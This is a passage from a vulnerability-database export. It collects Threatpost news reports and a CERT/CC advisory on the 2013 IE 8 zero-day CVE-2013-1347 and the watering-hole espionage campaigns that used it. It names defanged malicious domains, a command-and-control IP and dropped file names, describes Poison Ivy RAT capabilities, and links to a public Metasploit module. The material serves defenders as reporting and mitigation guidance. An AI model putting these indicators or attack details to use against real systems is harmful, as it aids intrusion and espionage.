patch the browser immediately, or upgrade to newer versions. In the meantime, some experts are calling on Microsoft to consider revamping its browser update method to perhaps model that used by Mozilla and Google.\n\n\u201cOn one level, this is Microsoft at their security best. They responded promptly to a publicly disclosed issue and got the fix out in the next scheduled wave of patches,\u201d said Rapid7 senior manager of security engineering Ross Barrett. \u201cOn another level, this issue, along with the fact that every single month we see another round of critical Internet Explorer patches, highlights what is wrong with Microsoft\u2019s patching and support models.\u201d\n\nMicrosoft has updated IE in every Patch Tuesday update this year, including an out-of-band patch in January that resolved a vulnerability used in another watering hole attack.\n\n\u201cCompare this to Google\u2019s Chrome browser, which quietly patches itself as fixes become available and has no down-level supported \u2018old version,\u2019 which exposes millions of their users to risk. Or compare it to Firefox, which has straddled the fence with periodic Long-Term-Support (LTS) releases for the risk adverse IT departments but now defaults it\u2019s users to the same model as Chrome,\u201d Barrett said. \u201cMicrosoft is tying up resources in maintaining the older versions and extending the window by which users are exposed to risk with their opt-in updates and periodic patching model.\u201d\n\nMicrosoft resolves the IE 8 bug in [MS13-038](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>), one of 10 bulletins released today. The critical update supplants a [temporary Fix-It mitigation](<http://threatpost.com/microsoft-fix-it-available-for-ie-8-zero-day-used-against-labor-website/>) Microsoft released last week, a MSHTML Shim Workaround for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>). The vulnerability is present in IE 8 only and is a use-after-free memory corruption flaw that enables remote code execution, and while IE 8 is an old version of the browser, it still has the highest market share with 23 percent, according to Net Market Share.\n\n[MS 13-037](<https://technet.microsoft.com/en-us/security/bulletin/ms13-037>), meanwhile, also has expert concerned now that details are public. It is a cumulative update for IE that addresses the Pwn2Own vulnerabilities exploited by security company VUPEN.\n\nVUPEN CEO Chaouki Bekrar told Threatpost his researchers used four zero-day exploits against Microsoft products during Pwn2Own, including an memory corruption, sandbox and ASLR-bypass bugs affecting IE 6-10.\n\n\u201cThe exploit is rated a \u20181\u2019 on the Microsoft Exploitability Index, meaning that Microsoft expects exploits to be developed within the next 30 days and that the attack vector would be a malicious website,\u201d said Wolfgang Kandek, Qualys CTO. \u201cPatch this vulnerability as soon as possible.\u201d\n\n[MS13-039](<https://technet.microsoft.com/en-us/security/bulletin/ms13-039>), meanwhile, is rated important, but could lead to a denial-of-service condition on boxes running Windows\u2019 IIS webserver software. The vulnerability could be disruptive to organizations running remote services or Active Directory integrations on http.sys.\n\n\u201cThe good news is that only Windows 2012 web servers are affected. All IT security teams should be jump on this quickly as an exploit is likely to be developed very quickly. A successful exploit could cause a DoS on affected servers creating temporary outages,\u201d said Andrew Storms, director of security operations for nCircle, a Tripwire company. \u201cThe bad news is that a successful exploit of this bug could have serious implications for public web servers without some kind of inline IPS in front of them. Essentially, any user could launch a simple attack and the server will essentially be offline. It\u2019s also worthwhile to note that many Microsoft servers have IIS turned on \u2014 including Exchange and SharePoint\u2013 so a successful exploit could potentially impact critical company infrastructure.\u201d\n\nThe remainder of the bulletins were rated important by Microsoft and include a number of remote code execution, information leakage and privilege escalation bugs.\n\n * [MS13-40](<http://technet.microsoft.com/en-us/security/bulletin/ms13-040>): patches a spoofing vulnerability the .NET framework that could allow an attacker to modify the contents of an XML file\n * [MS13-41](<http://technet.microsoft.com/en-us/security/bulletin/ms13-041>): fixes a flaw on Microsoft Lync that could enable remote code execution if an attacker tricks a user into viewing malicious content.\n * [MS13-42](<http://technet.microsoft.com/en-us/security/bulletin/ms13-042>): takes care of vulnerabilities in Microsoft Publisher that could allow an attacker to remotely execute code if a user opens a malicious Publisher file\n * [MS13-43](<http://technet.microsoft.com/en-us/security/bulletin/ms13-043>): patches a Word flaw that could give an attacker the same privileges as the user on a compromised machine.\n * [MS13-44](<http://technet.microsoft.com/en-us/security/bulletin/ms13-044>): is a Visio vulnerability that could lead to information disclosure if a user opens an infected Visio file.\n * [MS13-45](<http://technet.microsoft.com/en-us/security/bulletin/ms13-045>): repairs a Windows Essentials vulnerability that could lead to information disclosure if a user opens Windows Writer using a malicious URL.\n * [MS13-46](<http://technet.microsoft.com/en-us/security/bulletin/ms13-046>): is a privilege escalation vulnerability in Kernel-Mode Drivers that happens if an attacker logs onto a system with valid credentials and runs a malicious application.\n", "modified": "2013-05-15T12:45:08", "published": "2013-05-14T16:14:18", "id": "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "href": "https://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities/100633/", "type": "threatpost", "title": "Microsoft Patches IE Zero Day Used In Watering Hole Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:47", "bulletinFamily": "info", "cvelist": ["CVE-2013-1347"], "description": "One of the nine sites serving malware tied to the recent [watering hole attack on the U.S. Department of Labor](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/>) was located in Cambodia and has ties to the United States Agency for International Development (USAID).\n\nSpeculation has it that the [DoL attack was targeting downstream employees at the Department of Energy](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) who work on nuclear weapons programs. This site, meanwhile, was apparently after employees of USAID, which is a federal organizations that funnels assistance to impoverished or oppressed nations.\n\nResearcher [Eric Romang](<http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/>) found a connection to University Research Co. of Cambodia, a USAID partner in that country, and the dol[.]ns01[.]us backend serving malware to visitors of the DoL\u2019s Site Matrices Exposures website. The sites were compromised and serving javascript that redirects victims using Internet Explorer 8 to sites where additional malware, such as the Poison Ivy remote access Trojan, is downloaded and backdoor connections are established. The IE 8 zero day vulnerability, CVE-2013-1347, is expected to be patched tomorrow by Microsoft, which released a [Fix It temporary mitigation](<http://threatpost.com/microsoft-fix-it-available-for-ie-8-zero-day-used-against-labor-website/>) last Thursday.\n\nThe DoL\u2019s Site Matrices Exposures site is a repository of data on toxic substances present at nuclear facilities run by the Department of Energy. The infected Cambodian site is a page belonging to the Better Health Services project, a USAID-funded initiative to strengthen health care services in Cambodia. Researchers at Invicea and AlienVault also said that European aerospace, defense and security companies were also compromised, but none have been identified.\n\nThe attacks targeting USAID used social media accounts on Twitter and Facebook to entice victims to click on shortened URLs leading them to the University Research Co. website, Romang said.\n\nRomang found a connection referrer to the website on the backend server used in the attack. He discovered a Twitter account created on March 18 from @natividad_usaid that was providing links to the infected site; the Twitter account was deleted on April 10.\n\n\u201cSome Twitter users were directly contacted in order to incite them to click to the link and most of these users were related to USAID,\u201d Romang said.\n\nEven the link listed in the Twitter account\u2019s profile description contained a malicious shortened url leading users to a file hosted on a Dropbox account that Romang said is a direct link to the Poison Ivy malware.\n\nThe file establishes a connection to a command and control server microsoftUpdate[.]ns1[.]name and drops an executable called conime[.]exe which opens remote connections on ports 443 and 53, according to Invicea, and registry changes are made to maintain persistence on infected machines.\n\nA second connection referrer was found, Romang said, this one to a phony Facebook profile for a supposed USAID employee Kelly Black, a University of Virginia graduate living in D.C. The account included a profile picture of two young blonde women and was created and deleted on March 24, Romang said. The account was busy, however, finding 41 friends\u2014most with ties to USAID\u2014and each post contained a link to the University Research Co. and messages about a Mekong water sanitation project. One curious Facebook friend of Kelly Black\u2019s wanted to know which woman she was in the picture, which turns out was of a couple of supporters of the Swedish national soccer team taken during the 2012 European championships in Poland, Romang said.\n\nMicrosoft urges IE 8, at a minimum, to apply the Fix It for the zero day until a patch is released. The vulnerability is a remote-code execution use-after free flaw, which happens because of how the browser handles objects after they\u2019ve been deleted.\n\nFrom the initial analysis of the javascript on the DoL site, it collects system information checking for a number of antimalware programs, as well as third-party software such as Flash and Java, likely in order to launch further exploits. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\nThe Poison Ivy RAT, meanwhile, is a backdoor that an attacker can use to remotely access compromised machines and add or delete files, edit Registry files, view or kill running processes, network connections and services, and add or delete applications. It can be used for espionage as well as some variants have the capability to start remote command shells, take screenshots, start audio or video recordings and drop keylogging software.\n\nPhoto: Ryan Rodrick Beiler / Shutterstock.com\n", "modified": "2013-05-16T15:27:00", "published": "2013-05-13T10:52:56", "id": "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "href": "https://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/100528/", "type": "threatpost", "title": "USAID a Target of DoL Watering Hole Attackers", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:51", "bulletinFamily": "info", "cvelist": ["CVE-2012-4792", "CVE-2013-1347"], "description": "The scope of a [watering hole attack targeting the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) widened significantly over the weekend. Researchers are reporting that as many as nine websites, including a European aerospace, defense and security manufacturer as well as a number of non-profit organizations have also been compromised and are redirecting visitors to a website hosting malware.\n\nMicrosoft, meanwhile, released an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2847140>) warning Internet Explorer 8 users that the attackers are exploiting a zero-day vulnerability in Internet Explorer 8, and [not CVE-2012-4792](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792>) as originally was reported. Yesterday morning, a [Metasploit module](<https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit>) was released for this vulnerability, heightening the likelihood of additional attacks or inclusion into a commercial or private exploit kit.\n\nMicrosoft urges IE 8 users to upgrade to a newer version of the browser\u2014IE 6, 7, 9 and 10 are not vulnerable\u2014and that it will either release an out-of-band patch or address the flaw in an upcoming Patch Tuesday release. The next scheduled Microsoft security updates are next week.\n\nThe original outbreak was made public May 1 when it was reported that the DoL\u2019s Site Exposure Matrices website was infected and attackers had injected javascript via an iFrame that redirected site visitors to a site hosting the Poison Ivy remote access Trojan.\n\nThe espionage malware was originally thought to be exploiting a use-after free memory corruption vulnerability that Microsoft had patched earlier this year. The DoL\u2019s SEM site is a repository of data on toxic substances present at facilities run by the Department of Energy, and researchers at Invincea speculated that the attackers\u2019 targets were downstream employees of the Department of Energy who work on nuclear weapons programs.\n\nInvincea CTO and founder Anup Ghosh confirmed that a [previously unreported use-after free vulnerability](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347>) was being exploited in this attack and that only IE 8 was affected. Ghosh said his researchers were still able to [reproduce an infection](<http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/>) on a Windows XP machine running Windows 8 that was patched with MS13-008 that addressed CVE-2012-4792.\n\nMicrosoft confirmed in its advisory that this is a remote code execution vulnerability, and that IE does not properly handle objects in memory that have been deleted or not properly allocated. Microsoft suggests that users take caution when sent links via email or IM messages. In the meantime, Microsoft suggests setting Internet and local intranet security zones to \u201chigh\u201d to block ActiveX Controls and Scripting, as well as to configure IE to prompt before running Active Scripting.\n\nThe malware drops an executable called conime[.]exe onto the infected computer and opens remote connections on ports 443 and 53, Invincea said, adding there were two redirects present on the DoL page sending visitors to dol[.]ns01[.]us. Once the user is redirected, a file is executed, ports are opened and registry changes are made to maintain persistence on the machine. Ghosh said that one of the command and control servers had already been blacklisted by Google.\n\nAlien Vault Lab manager Jaime Blasco said that researchers had detected [redirects to another server](<http://labs.alienvault.com/labs/index.php/2013/new-internet-explorer-zeroday-was-used-in-the-dol-watering-hole-campaign/>) at sellagreement[.]com. That domain was also serving some of the malicious payloads found on dol[.]ns01[.]us. Blasco recommends checking logs for connections to either of those domains.\n\nFrom the initial analysis of the javascript on the DoL site, it collects system information checking for a number of antimalware programs, as well as third-party software such as Flash and Java, likely in order to launch further exploits. Blasco added that the command and control protocol used in the attack matches that of a Chinese espionage gang known as DeepPanda; other characteristics of this attack match those used against a Thai human rights nongovernment organization website.\n\nThe Poison Ivy RAT, meanwhile, is a backdoor that an attacker can use to remotely access compromised machines and add or delete files, edit Registry files, view or kill running processes, network connections and services, and add or delete applications. It can be used for espionage as well as some variants have the capability to start remote command shells, take screenshots, start audio or video recordings and drop keylogging software.\n", "modified": "2013-07-02T19:25:28", "published": "2013-05-06T11:14:47", "id": "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "href": "https://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212/", "type": "threatpost", "title": "IE 8 Zero Day Widens Scope of DoL Watering Hole Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "cvelist": ["CVE-2013-1347", "CVE-2017-11882"], "description": "Microsoft has released a Fix-It to address an Internet Explorer 8 zero-day that was exploited in a [watering hole attack against the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/>) last week.\n\nThe [Fix It](<http://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx>) is a temporary mitigation until a patch is released. Microsoft\u2019s next scheduled Patch Tuesday security updates are set for next week, though it\u2019s unlikely an update for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>) will be ready in time.\n\nThe vulnerability is present only in IE 8, Microsoft said. The flaw is a [use-after free memory corruption bug](<http://technet.microsoft.com/en-us/security/advisory/2847140>) that would allow an attacker to be able to remotely execute code on a compromised machine.\n\n\u201cThe Fix It is an effort to help protect as many customers as possible, as quickly as possible,\u201d said Dustin Childs, group manager Trustworthy Computing.\n\nThis is the second Fix It that Microsoft has issued this year. The first was also for a similar memory-related vulnerability in IE in January that was used in watering hole attacks against a number of government, political and manufacturing websites. IE 8 was the primary culprit there as well, though IE 6 and 7 were also vulnerable yet no exploits were public for those two versions.\n\nAccording to Net Market Share, [IE 8 has the highest market share](<http://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0>) with 23 percent, followed by IE 9 (18 percent) and Chrome 26.0 (13 percent). Experts who analyzed the [attack against the Department of Labor\u2019s Site Exposure Matrices](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/>) website said that the typical government agency worker would likely still be running IE 8, making them a tempting target for such an attack.\n\n[Watering hole attacks](<http://threatpost.com/why-watering-hole-attacks-work-032013/>) are similar to drive-by downloads where an ad or a streaming file on a website is vulnerable to an iFrame attack. Javascript is injected into a Flash or Java applet that redirects the user to a third-party site where more malware is downloaded or credentials are stolen. The concept here is that the attacker infects a site of specific interest to their target, rather than spear phishing a narrow list of potential victims.\n\nThis tactic has been employed not only against government workers and political activists as part of espionage campaigns, but against a popular mobile developer\u2019s website that ensnared a number of Facebook, Apple, Microsoft and Twitter employees.\n\nIn the case of the DoL, the target was likely downstream employees of the Department Energy who work on nuclear weapons programs, experts at Invincea speculated. The DoL\u2019s SEM site is a resource for employees who may have been exposed to radiation. The redirect on the site was sending visitors to a site hosting the Poison Ivy remote access Trojan, malware that is used espionage campaigns; it opens a backdoor on compromised computers where attackers can move about unnoticed.\n\nMicrosoft\u2019s first Fix It of 2013, however, wasn\u2019t a smashing success. Shortly after it was released, researchers at Exodus Intelligence reported they were able to [bypass](<http://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>) it. While the Fix It did address one means attackers had at their disposal to get onto victims\u2019 machines, it didn\u2019t address all possible avenues.\n", "modified": "2013-05-09T16:04:34", "published": "2013-05-09T12:04:34", "id": "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "href": "https://threatpost.com/microsoft-fix-it-available-for-ie-8-zero-day-used-against-labor-website/100419/", "type": "threatpost", "title": "Microsoft Fix It a Temporary Patch for IE 8 Zero Day Flaw", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-1723", "CVE-2013-1347", "CVE-2013-1690"], "description": "A string of watering hole attacks targeting oil and energy companies dating back to May could be linked to similar[ attacks against the U.S. Department of Labor website](<http://threatpost.com/watering-hole-attack-claims-us-department-of-labor-website/100081>).\n\nResearchers at Cisco discovered the [compromised domains of 10 oil and energy companies](<http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/>) worldwide, including hydroelectric plants, natural gas distributors, industrial suppliers to the energy sector and investment firms serving those markets. Six of the 10 sites shared the same Web design firm and three of the six are owned by the same parent company. Cisco researcher Emmanuel Tacheau speculates that credentials at the Web design firm were stolen, leading to the compromises.\n\nThe 10 sites were exploited and serving iframe redirects to other sites hosting espionage malware, possibly the [Poison Ivy remote access Trojan](<http://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022>).\n\n\u201cThe assumption is, with the target companies being in the energy sector, they were attempting to infect machines within that sector and exfiltrate intellectual property,\u201d Tacheau said.\n\nThe iframes load exploit code and malware from three compromised domains\u2014keeleux[.]com, kenzhebek[.], and nahoonservices[.]com. The exploits target primarily a Java vulnerability, [CVE-2012-1723](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1723>), or a flaw in Internet Explorer 8, [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>). A Firefox exploit was also found in these attacks, [CVE-2013-1690](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1690>).\n\nCisco said the malware used in the attacks is a Trojan that captures system configurations, as well as clipboard and keyboard data. It also establishes an encrypted connection to a command and control server hosted in Greece awaiting commands. All of the infected sites were notified and most had been cleaned up, Cisco said.\n\n\u201cDetection for the malware was extremely low, so that\u2019s always a concern,\u201d Tacheau said. \u201cFortunately, exploit detection for the exploits used is pretty good, so hopefully people will have been protected.\u201d\n\nWatering hole attacks are effective because they target websites of interest to the intended victim. In the past, government policy resource websites and mobile developer forums have been compromised in other watering hole attacks.\n\nAt the time of the Department of Labor attacks, also in May, the [IE 8 exploit was a zero-day ](<http://threatpost.com/ie-8-zero-day-found-as-dol-watering-hole-attack-spreads-to-nine-other-sites/100212>)and had infected the DOL\u2019s Site Exposure Matrices (SEM) website with javascript redirecting victims to the Poison Ivy RAT. The SEM website is a repository of data on toxic substances found at facilities run by the Department of Energy. At the time, security experts speculated the attackers were targeting DOE employees working on nuclear weapons programs.\n\nThe [IE vulnerability was patched in May](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities/100633>), but not before those [attacks spread to nine other sites including the US Agency for International Development (USAID)](<http://threatpost.com/usaid-workers-also-targeted-by-dol-watering-hole-attackers/100528>) and research firms in Asia.\n\nGiven the timing of the two attacks and the use of the same Internet Explorer exploit, the Department of Labor attacks could be tied to the energy and oil attacks as well.\n\n\u201cThat\u2019s the million dollar question,\u201d Tacheau said. \u201cThere certainly are a lot of commonalities. If you combine the timing, the shared exploit and the sector targeted, it does seem at least suspiciously in favor of a semblance of attackers.\u201d\n\nThe oil and energy attacks, however, were found coincidentally by Cisco researchers looking at system logs and noticing the commonalities in the sectors targeted.\n\n\u201cIt boils down to a matter of volume,\u201d Tacheau said. \u201cThese were low volume-high stakes attacks; these sites don\u2019t attract a large number of visitors. The DOL attacks were different. When you have a high profile site like that, those are always going to be spotted off the bat.\u201d\n\n[_Image courtesy KenHodge13 Flickr_](<http://www.flickr.com/photos/40132991@N07/>)\n", "modified": "2013-09-24T19:10:09", "published": "2013-09-19T15:55:05", "id": "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB", "href": "https://threatpost.com/oil-energy-watering-hole-attacks-could-be-tied-to-dol-attacks/102366/", "type": "threatpost", "title": "Oil, Energy Watering Hole Attacks Linked to DOL attack", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:45", "bulletinFamily": "info", "cvelist": ["CVE-2013-1347", "CVE-2013-1493", "CVE-2013-2423"], "description": "Lady Boyle seems to have an admirer.\n\nMalware named after a character in the Dishonored video game continues to pop up in targeted attacks against a number of high profile military and socially motivated websites. The latest surfaced about 10 days ago in an attack researchers at FireEye are calling the Sunshop Campaign.\n\nSunshop targeted a number of Korean military and political strategy websites, as well as a Uyghur forum among others with a pair of Java exploits and the recently [patched IE 8 vulnerability](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>) recently used against the U.S. Department of Labor and a number of other sites. The exploits were redirecting vulnerable visitors to sunshop[.]com[.]tw where a host of malware awaits including Lady Boyle, which has been deployed in other [attacks against the Uyghur](<https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&ved=0CFcQFjAF&url=http%3A%2F%2Fthreatpost.com%2Fmalware-arsenal-targets-tibetan-activists-040213%2F&ei=V7ybUZhgq7PRAdzagfAD&usg=AFQjCNGKZ8xrkJiBv_H9dqZlQdevNV6PgQ&sig2=E2KLpJnzNz4LttVm7aPl_A&bvm=bv.46865395,d.dmQ>), in particular, and in the [Winnti attacks](<http://threatpost.com/stolen-winnti-certificates-used-watering-hole-attack-against-tibet-orphans-site-041213/>).\n\n\u201cA number of different Chinese-based espionage threat attackers use that malware, so it\u2019s hard to use that indicator alone as a tie it to one particular threat actor,\u201d said Ned Moran, a researcher at FireEye. \u201cAt least 5 different groups are using that malware. It\u2019s a popular tool used by intrusion actors.\n\n\u201cBased on the sites compromised, there was a clear focus on Korean security and defense related issues,\u201d Moran said. \u201cThe attackers are looking for data around the Korean defense posture.\u201d\n\nThe group behind Sunshop was also behind a 2010 attack on the Nobel Prize website that took advantage of a zero-day in Firefox, FireEye said.\n\nThese attacks can be considered watering hole attacks since all the sites are popular with influential targets and have javascript exploits that redirect victims to espionage-type malware.\n\n\u201cThese sites are well trafficked and the attackers have a strong sense of the audiences of these sites,\u201d Moran said. \u201cThey compromise the sites and wait for traffic to come to them.\u201d\n\nThe Lady Boyle malware, which is a remote access Trojan, is being served from three different command and control servers in the Sunshop attacks. IE8 users who land on the compromised site are hit with an exploit for [CVE-2013-1347](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347>) pulled in from hk[.]sz181[.]com connected to a C&C server at dns[.]homesvr[.]tk. The two Java exploits, meanwhile, exploit [CVE-2013-2423](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2423>) and [CVE-2013-1493](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493>), both of which have been patched. All of the command and control servers, FireEye said, resolved to 58[.]64[.]205[.]53, used by another domain used to drop Briba malware, also known as the [IExplore RAT](<https://citizenlab.org/wp-content/uploads/2012/09/IEXPL0RE_RAT.pdf>) targeting NGOs.\n\n\u201cThis is a traditional RAT type of malware that provides access to a machine, runs commands, downloads victim data or uploads new executables to the victim, or runs shell commands,\u201d Moran said. In our experience, we have not seen it used outside this small set of intrusion actors; it\u2019s not commercially available. Whenever see it, tends show up in these types attacks, strategic espionage attacks.\u201d\n\nFireEye researchers also discovered a connection between the Sunshop[.]com[.]tw host and the PoisonIvy RAT used in a number of other targeted attacks.\n\n\u201cThat was the first time [Sunshop] was used as an exploit server; it\u2019s been in play for a few months,\u201d Moran said.\n", "modified": "2013-05-23T18:36:13", "published": "2013-05-21T14:40:44", "id": "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "href": "https://threatpost.com/ie-8-zero-day-pops-up-in-targeted-attacks-against-korean-military-sites/100728/", "type": "threatpost", "title": "IE 8 0Day in Sunshop Targeted Espionage Malware Campaign", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:41:54", "bulletinFamily": "info", "cvelist": ["CVE-2013-1347"], "description": "### Overview \n\nMicrosoft Internet Explorer 8 contains a use-after-free vulnerability in the `CGenericElement` object, which is currently being exploited in the wild.\n\n### Description \n\n[Microsoft Security Advisory 2847140](<http://technet.microsoft.com/en-us/security/advisory/2847140>) states:\n\n_Internet Explorer 6, Internet Explorer 7, Internet Explorer 9, and Internet Explorer 10 are not affected by the vulnerability._ \n \n_This is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website._ \n \nAdditional details may be found in the [full advisory](<http://technet.microsoft.com/en-us/security/advisory/2847140>). A Metasploit module has been released to exploit this vulnerability as well. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to run arbitrary code in the context of the user running Internet Explorer 8. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nMicrosoft has released [MS13-038](<https://technet.microsoft.com/en-us/security/bulletin/ms13-038>) to address this vulnerability. The patch may be obtain through [Microsoft's Windows Update](<http://go.microsoft.com/fwlink/?LinkID=40747>). \n \nIf you are unable to upgrade, please consider the following workarounds. \n \n--- \n \n**Apply a Microsoft \"Fix It\"** \n \nMicrosoft has [released a Microsoft \"Fix It\" solution](<http://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx>) for this vulnerability. The \"Fix It\" solution uses the Windows application compatibility toolkit to make a small change at runtime to mshtml.dll every time IE is loaded. \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit** \n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://support.microsoft.com/kb/2458544>) (EMET) can be used to help prevent exploitation of this vulnerability. CERT/CC has created a [video tutorial for setting up EMET 3.0](<http://www.youtube.com/watch?v=28_LUs_g0u4>) on Windows 7. Note that platforms that do not support ASLR, such as Windows XP and Windows Server 2003, will not receive the same level of protection that modern Windows platforms will. While still in beta, [EMET 4.0](<http://www.microsoft.com/en-us/download/details.aspx?id=38761>) provides additional exploit mitigations that EMET 3.0 does not that will increase the difficulty of exploitation for an adversary. \n \n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n \nNote that when relying on DEP for exploit mitigation, it is important to use a system that supports Address Space Layout Randomization (ASLR) as well. ASLR is not supported by Windows XP or Windows Server 2003 or earlier. ASLR was introduced with Microsoft Windows Vista and Windows Server 2008. Please see the Microsoft SRD blog entry: [On the effectiveness of DEP and ASLR](<http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx>) for more details. \n \n--- \n \n### Vendor Information\n\n237655\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation Affected\n\nUpdated: May 06, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://technet.microsoft.com/en-us/security/advisory/2847140>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.4 | AV:N/AC:L/Au:N/C:C/I:C/A:N \nTemporal | 8.9 | E:H/RL:W/RC:C \nEnvironmental | 6.7 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://technet.microsoft.com/en-us/security/bulletin/ms13-038>\n * <http://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx>\n * <http://technet.microsoft.com/en-us/security/advisory/2847140>\n * <http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx>\n * <https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit>\n * <http://dev.metasploit.com/redmine/projects/framework/repository/revisions/a33510e82135355548a529e5f0cb5ab7134d674d/entry/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb>\n * <http://labs.alienvault.com/labs/index.php/2013/u-s-department-of-labor-website-hacked-and-redirecting-to-malicious-code/>\n\n### Acknowledgements\n\nThis vulnerability was discovered in the wild.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-1347](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-1347>) \n---|--- \n**Date Public:** | 2013-05-03 \n**Date First Published:** | 2013-05-06 \n**Date Last Updated: ** | 2013-05-14 17:28 UTC \n**Document Revision: ** | 29 \n", "modified": "2013-05-14T17:28:00", "published": "2013-05-06T00:00:00", "id": "VU:237655", "href": "https://www.kb.cert.org/vuls/id/237655", "type": "cert", "title": "Microsoft Internet Explorer 8 CGenericElement object use-after-free vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": 